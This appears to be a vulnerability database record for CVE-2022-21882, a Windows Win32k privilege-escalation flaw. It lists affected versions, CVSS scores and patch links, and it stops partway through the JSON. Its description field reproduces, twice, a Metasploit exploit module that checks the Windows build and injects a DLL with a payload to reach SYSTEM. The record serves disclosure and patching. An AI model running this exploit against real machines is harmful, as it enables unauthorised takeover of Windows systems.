var-202201-0580
Vulnerability from variot
Win32k Elevation of Privilege Vulnerability. Microsoft Windows 10 , Windows 11 , Windows Server Has Win32k There is a vulnerability that can elevate privileges due to a flaw in. Microsoft Win32k是美国微软(Microsoft)公司的一个用于Windows多用户管理的系统文件. Microsoft Win32K 存在安全漏洞。以下产品和版本受到影响:Windows 10 Version 21H1 for 32-bit Systems,Windows Server 2022,Windows Server 2022 (Server Core installation),Windows 10 Version 1909 for ARM64-based Systems,Windows 10 Version 20H2 for x64-based Systems,Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows 10 Version 1809 for ARM64-based Systems,Windows Server 2019,Windows Server 2019 (Server Core installation),Windows 10 Version 1909 for 32-bit Systems,Windows 10 Version 1909 for x64-based Systems,Windows 10 Version 21H1 for x64-based Systems,Windows 10 Version 21H1 for ARM64-based Systems,Windows 10 Version 20H2 for 32-bit Systems,Windows 10 Version 20H2 for ARM64-based Systems,Windows Server, version 20H2 (Server Core Installation),Windows 11 for x64-based Systems,Windows 11 for ARM64-based Systems,Windows 10 Version 21H2 for 32-bit Systems,Windows 10 Version 21H2 for ARM64-based Systems,Windows 10 Version 21H2 for x64-based Systems. ##
This module requires Metasploit: https://metasploit.com/download
Current source: https://github.com/rapid7/metasploit-framework
class MetasploitModule < Msf::Exploit::Local Rank = AverageRanking
include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Process include Msf::Post::Windows::ReflectiveDLLInjection prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Deprecated moved_from 'exploit/windows/local/cve_2021_1732_win32k'
def initialize(info = {}) super( update_info( info, { 'Name' => 'Win32k ConsoleControl Offset Confusion', 'Description' => %q{ A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of NT AUTHORITY\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to achieve an out of bounds write operation, eventually leading to privilege escalation.
This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021.
In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is
is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to
function on a wider range of Windows 10 targets.
},
'License' => MSF_LICENSE,
'Author' => [
# CVE-2021-1732
'BITTER APT', # exploit as used in the wild
'JinQuan', # detailed analysis
'MaDongZe', # detailed analysis
'TuXiaoYi', # detailed analysis
'LiHao', # detailed analysis
# CVE-2022-21882
'L4ys', # github poc
# both CVEs
'KaLendsi', # github pocs
# Metasploit exploit
'Spencer McIntyre' # metasploit module
],
'Arch' => [ ARCH_X64 ],
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' => {
'EXITFUNC' => 'thread'
},
'Targets' => [
[ 'Windows 10 v1803-21H2 x64', { 'Arch' => ARCH_X64 } ]
],
'Payload' => {
'DisableNops' => true
},
'References' => [
# CVE-2021-1732 references
[ 'CVE', '2021-1732' ],
[ 'URL', 'https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/' ],
[ 'URL', 'https://github.com/KaLendsi/CVE-2021-1732-Exploit' ],
[ 'URL', 'https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e' ],
[ 'URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732' ],
# the rest are not cve-2021-1732 specific but are on topic regarding the techniques used within the exploit
[ 'URL', 'https://www.fuzzysecurity.com/tutorials/expDev/22.html' ],
[ 'URL', 'https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm' ],
[ 'URL', 'https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html' ],
[ 'URL', 'https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html' ],
# CVE-2022-21882 references
[ 'CVE', '2022-21882' ],
[ 'URL', 'https://github.com/L4ys/CVE-2022-21882' ],
[ 'URL', 'https://github.com/KaLendsi/CVE-2022-21882' ]
],
'DisclosureDate' => '2021-02-09', # CVE-2021-1732 disclosure date
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [ CRASH_OS_RESTARTS, ],
'Reliability' => [ REPEATABLE_SESSION, ],
'SideEffects' => []
}
}
)
)
end
def check sysinfo_value = sysinfo['OS']
if sysinfo_value !~ /windows/i
# Non-Windows systems are definitely not affected.
return Exploit::CheckCode::Safe
end
build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
vprint_status("Windows Build Number = #{build_num}")
unless sysinfo_value =~ /10/ && (build_num >= 17134 && build_num <= 19044)
print_error('The exploit only supports Windows 10 versions 1803 - 21H2')
return CheckCode::Safe
end
CheckCode::Appears
end
def exploit if is_system? fail_with(Failure::None, 'Session is already elevated') end
if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86
fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64
fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
end
encoded_payload = payload.encoded
execute_dll(
::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-21882', 'CVE-2022-21882.x64.dll'),
[encoded_payload.length].pack('I<') + encoded_payload
)
print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
end end
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202201-0580",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "windows 10 20h2",
"scope": "lt",
"trust": 1.0,
"vendor": "microsoft",
"version": "10.0.19042.1466"
},
{
"model": "windows server 2019",
"scope": "lt",
"trust": 1.0,
"vendor": "microsoft",
"version": "10.0.17763.2452"
},
{
"model": "windows server 2022",
"scope": "lt",
"trust": 1.0,
"vendor": "microsoft",
"version": "10.0.20348.469"
},
{
"model": "windows 11 21h2",
"scope": "lt",
"trust": 1.0,
"vendor": "microsoft",
"version": "10.0.22000.434"
},
{
"model": "windows 10 21h1",
"scope": "lt",
"trust": 1.0,
"vendor": "microsoft",
"version": "10.0.19043.1466"
},
{
"model": "windows 10 1909",
"scope": "lt",
"trust": 1.0,
"vendor": "microsoft",
"version": "10.0.18363.2037"
},
{
"model": "windows server 20h2",
"scope": "lt",
"trust": 1.0,
"vendor": "microsoft",
"version": "10.0.19042.1466"
},
{
"model": "windows 10 1809",
"scope": "lt",
"trust": 1.0,
"vendor": "microsoft",
"version": "10.0.17763.2452"
},
{
"model": "windows 10 21h2",
"scope": "lt",
"trust": 1.0,
"vendor": "microsoft",
"version": "10.0.19044.1466"
},
{
"model": "microsoft windows server",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30de\u30a4\u30af\u30ed\u30bd\u30d5\u30c8",
"version": "2019"
},
{
"model": "microsoft windows server",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30de\u30a4\u30af\u30ed\u30bd\u30d5\u30c8",
"version": "2022"
},
{
"model": "microsoft windows server",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30de\u30a4\u30af\u30ed\u30bd\u30d5\u30c8",
"version": "2022 (server core installation)"
},
{
"model": "microsoft windows server 2022",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30de\u30a4\u30af\u30ed\u30bd\u30d5\u30c8",
"version": "(server core installation)"
},
{
"model": "microsoft windows server 2019",
"scope": null,
"trust": 0.8,
"vendor": "\u30de\u30a4\u30af\u30ed\u30bd\u30d5\u30c8",
"version": null
},
{
"model": "microsoft windows 10",
"scope": null,
"trust": 0.8,
"vendor": "\u30de\u30a4\u30af\u30ed\u30bd\u30d5\u30c8",
"version": null
},
{
"model": "microsoft windows server",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30de\u30a4\u30af\u30ed\u30bd\u30d5\u30c8",
"version": "20h2 (server core installation)"
},
{
"model": "microsoft windows 11",
"scope": null,
"trust": 0.8,
"vendor": "\u30de\u30a4\u30af\u30ed\u30bd\u30d5\u30c8",
"version": null
},
{
"model": "microsoft windows server 2022",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30de\u30a4\u30af\u30ed\u30bd\u30d5\u30c8",
"version": null
},
{
"model": "microsoft windows server",
"scope": "eq",
"trust": 0.8,
"vendor": "\u30de\u30a4\u30af\u30ed\u30bd\u30d5\u30c8",
"version": "2019 (server core installation)"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-001057"
},
{
"db": "NVD",
"id": "CVE-2022-21882"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x64:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:x86:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:arm64:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x64:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:arm64:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:x86:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x64:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:arm64:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:x86:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x64:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:arm64:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:microsoft:windows_11:-:*:*:*:*:*:x64:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:arm64:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:x86:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:microsoft:windows_server:20h2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:microsoft:windows_server:2022:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:arm64:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x64:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:21h2:*:*:*:*:*:x86:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2022-21882"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "RyeLv (@b2ahex)",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202201-802"
}
],
"trust": 0.6
},
"cve": "CVE-2022-21882",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Local",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 7.2,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2022-21882",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"author": "secure@microsoft.com",
"availabilityImpact": "HIGH",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.0,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2022-21882",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2022-21882",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "secure@microsoft.com",
"id": "CVE-2022-21882",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202201-802",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2022-21882",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-21882"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-001057"
},
{
"db": "CNNVD",
"id": "CNNVD-202201-802"
},
{
"db": "NVD",
"id": "CVE-2022-21882"
},
{
"db": "NVD",
"id": "CVE-2022-21882"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Win32k Elevation of Privilege Vulnerability. Microsoft Windows 10 , Windows 11 , Windows Server Has Win32k There is a vulnerability that can elevate privileges due to a flaw in. Microsoft Win32k\u662f\u7f8e\u56fd\u5fae\u8f6f\uff08Microsoft\uff09\u516c\u53f8\u7684\u4e00\u4e2a\u7528\u4e8eWindows\u591a\u7528\u6237\u7ba1\u7406\u7684\u7cfb\u7edf\u6587\u4ef6. \nMicrosoft Win32K \u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\u3002\u4ee5\u4e0b\u4ea7\u54c1\u548c\u7248\u672c\u53d7\u5230\u5f71\u54cd\uff1aWindows 10 Version 21H1 for 32-bit Systems,Windows Server 2022,Windows Server 2022 (Server Core installation),Windows 10 Version 1909 for ARM64-based Systems,Windows 10 Version 20H2 for x64-based Systems,Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows 10 Version 1809 for ARM64-based Systems,Windows Server 2019,Windows Server 2019 (Server Core installation),Windows 10 Version 1909 for 32-bit Systems,Windows 10 Version 1909 for x64-based Systems,Windows 10 Version 21H1 for x64-based Systems,Windows 10 Version 21H1 for ARM64-based Systems,Windows 10 Version 20H2 for 32-bit Systems,Windows 10 Version 20H2 for ARM64-based Systems,Windows Server, version 20H2 (Server Core Installation),Windows 11 for x64-based Systems,Windows 11 for ARM64-based Systems,Windows 10 Version 21H2 for 32-bit Systems,Windows 10 Version 21H2 for ARM64-based Systems,Windows 10 Version 21H2 for x64-based Systems. ##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule \u003c Msf::Exploit::Local\n Rank = AverageRanking\n\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::ReflectiveDLLInjection\n prepend Msf::Exploit::Remote::AutoCheck\n\n include Msf::Exploit::Deprecated\n moved_from \u0027exploit/windows/local/cve_2021_1732_win32k\u0027\n\n def initialize(info = {})\n super(\n update_info(\n info,\n {\n \u0027Name\u0027 =\u003e \u0027Win32k ConsoleControl Offset Confusion\u0027,\n \u0027Description\u0027 =\u003e %q{\n A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of\n NT AUTHORITY\\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being\n treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to\n achieve an out of bounds write operation, eventually leading to privilege escalation. \n\n This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021. \n In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is\n is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to\n function on a wider range of Windows 10 targets. \n },\n \u0027License\u0027 =\u003e MSF_LICENSE,\n \u0027Author\u0027 =\u003e [\n # CVE-2021-1732\n \u0027BITTER APT\u0027, # exploit as used in the wild\n \u0027JinQuan\u0027, # detailed analysis\n \u0027MaDongZe\u0027, # detailed analysis\n \u0027TuXiaoYi\u0027, # detailed analysis\n \u0027LiHao\u0027, # detailed analysis\n # CVE-2022-21882\n \u0027L4ys\u0027, # github poc\n # both CVEs\n \u0027KaLendsi\u0027, # github pocs\n # Metasploit exploit\n \u0027Spencer McIntyre\u0027 # metasploit module\n ],\n \u0027Arch\u0027 =\u003e [ ARCH_X64 ],\n \u0027Platform\u0027 =\u003e \u0027win\u0027,\n \u0027SessionTypes\u0027 =\u003e [ \u0027meterpreter\u0027 ],\n \u0027DefaultOptions\u0027 =\u003e {\n \u0027EXITFUNC\u0027 =\u003e \u0027thread\u0027\n },\n \u0027Targets\u0027 =\u003e [\n [ \u0027Windows 10 v1803-21H2 x64\u0027, { \u0027Arch\u0027 =\u003e ARCH_X64 } ]\n ],\n \u0027Payload\u0027 =\u003e {\n \u0027DisableNops\u0027 =\u003e true\n },\n \u0027References\u0027 =\u003e [\n # CVE-2021-1732 references\n [ \u0027CVE\u0027, \u00272021-1732\u0027 ],\n [ \u0027URL\u0027, \u0027https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/\u0027 ],\n [ \u0027URL\u0027, \u0027https://github.com/KaLendsi/CVE-2021-1732-Exploit\u0027 ],\n [ \u0027URL\u0027, \u0027https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e\u0027 ],\n [ \u0027URL\u0027, \u0027https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732\u0027 ],\n # the rest are not cve-2021-1732 specific but are on topic regarding the techniques used within the exploit\n [ \u0027URL\u0027, \u0027https://www.fuzzysecurity.com/tutorials/expDev/22.html\u0027 ],\n [ \u0027URL\u0027, \u0027https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm\u0027 ],\n [ \u0027URL\u0027, \u0027https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html\u0027 ],\n [ \u0027URL\u0027, \u0027https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html\u0027 ],\n # CVE-2022-21882 references\n [ \u0027CVE\u0027, \u00272022-21882\u0027 ],\n [ \u0027URL\u0027, \u0027https://github.com/L4ys/CVE-2022-21882\u0027 ],\n [ \u0027URL\u0027, \u0027https://github.com/KaLendsi/CVE-2022-21882\u0027 ]\n ],\n \u0027DisclosureDate\u0027 =\u003e \u00272021-02-09\u0027, # CVE-2021-1732 disclosure date\n \u0027DefaultTarget\u0027 =\u003e 0,\n \u0027Notes\u0027 =\u003e {\n \u0027Stability\u0027 =\u003e [ CRASH_OS_RESTARTS, ],\n \u0027Reliability\u0027 =\u003e [ REPEATABLE_SESSION, ],\n \u0027SideEffects\u0027 =\u003e []\n }\n }\n )\n )\n end\n\n def check\n sysinfo_value = sysinfo[\u0027OS\u0027]\n\n if sysinfo_value !~ /windows/i\n # Non-Windows systems are definitely not affected. \n return Exploit::CheckCode::Safe\n end\n\n build_num = sysinfo_value.match(/\\w+\\d+\\w+(\\d+)/)[0].to_i\n vprint_status(\"Windows Build Number = #{build_num}\")\n\n unless sysinfo_value =~ /10/ \u0026\u0026 (build_num \u003e= 17134 \u0026\u0026 build_num \u003c= 19044)\n print_error(\u0027The exploit only supports Windows 10 versions 1803 - 21H2\u0027)\n return CheckCode::Safe\n end\n\n CheckCode::Appears\n end\n\n def exploit\n if is_system?\n fail_with(Failure::None, \u0027Session is already elevated\u0027)\n end\n\n if sysinfo[\u0027Architecture\u0027] == ARCH_X64 \u0026\u0026 session.arch == ARCH_X86\n fail_with(Failure::NoTarget, \u0027Running against WOW64 is not supported\u0027)\n elsif sysinfo[\u0027Architecture\u0027] == ARCH_X64 \u0026\u0026 target.arch.first == ARCH_X86\n fail_with(Failure::NoTarget, \u0027Session host is x64, but the target is specified as x86\u0027)\n elsif sysinfo[\u0027Architecture\u0027] == ARCH_X86 \u0026\u0026 target.arch.first == ARCH_X64\n fail_with(Failure::NoTarget, \u0027Session host is x86, but the target is specified as x64\u0027)\n end\n\n encoded_payload = payload.encoded\n execute_dll(\n ::File.join(Msf::Config.data_directory, \u0027exploits\u0027, \u0027CVE-2022-21882\u0027, \u0027CVE-2022-21882.x64.dll\u0027),\n [encoded_payload.length].pack(\u0027I\u003c\u0027) + encoded_payload\n )\n\n print_good(\u0027Exploit finished, wait for (hopefully privileged) payload execution to complete.\u0027)\n end\nend\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2022-21882"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-001057"
},
{
"db": "CNNVD",
"id": "CNNVD-202201-802"
},
{
"db": "VULMON",
"id": "CVE-2022-21882"
},
{
"db": "PACKETSTORM",
"id": "166169"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2022-21882",
"trust": 3.4
},
{
"db": "PACKETSTORM",
"id": "166169",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2022-001057",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202201-802",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2022-21882",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-21882"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-001057"
},
{
"db": "PACKETSTORM",
"id": "166169"
},
{
"db": "CNNVD",
"id": "CNNVD-202201-802"
},
{
"db": "NVD",
"id": "CVE-2022-21882"
}
]
},
"id": "VAR-202201-0580",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 1.0
},
"last_update_date": "2024-07-25T03:57:49.081000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Win32k\u00a0Elevation\u00a0of\u00a0Privilege\u00a0Vulnerability Security Update Guide",
"trust": 0.8,
"url": "https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2022-21882"
},
{
"title": "Microsoft Win32k Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=184439"
},
{
"title": "CVE-2022-21882",
"trust": 0.1,
"url": "https://github.com/l4ys/cve-2022-21882 "
},
{
"title": "cve-2022-21882-poc",
"trust": 0.1,
"url": "https://github.com/sailay1996/cve-2022-21882-poc "
},
{
"title": "CVE-2021-1732",
"trust": 0.1,
"url": "https://github.com/r1l4-i3pur1l4/cve-2021-1732 "
},
{
"title": "CVE-2022-21882",
"trust": 0.1,
"url": "https://github.com/david-honisch/cve-2022-21882 "
},
{
"title": "CVE-2022-21882",
"trust": 0.1,
"url": "https://github.com/kalendsi/cve-2022-21882 "
},
{
"title": "CVE-2022-21882",
"trust": 0.1,
"url": "https://github.com/dishfwk/cve-2022-21882 "
},
{
"title": "CVE-2022-21882",
"trust": 0.1,
"url": "https://github.com/r1l4-i3pur1l4/cve-2022-21882 "
},
{
"title": "exp_x64 code by 1900",
"trust": 0.1,
"url": "https://github.com/legendsaber/exp_x64 "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2022-21882"
},
{
"db": "JVNDB",
"id": "JVNDB-2022-001057"
},
{
"db": "CNNVD",
"id": "CNNVD-202201-802"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-787",
"trust": 1.0
},
{
"problemtype": "Improper authority management (CWE-269) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2022-001057"
},
{
"db": "NVD",
"id": "CVE-2022-21882"
}
]
},
"references": {
"@context": {
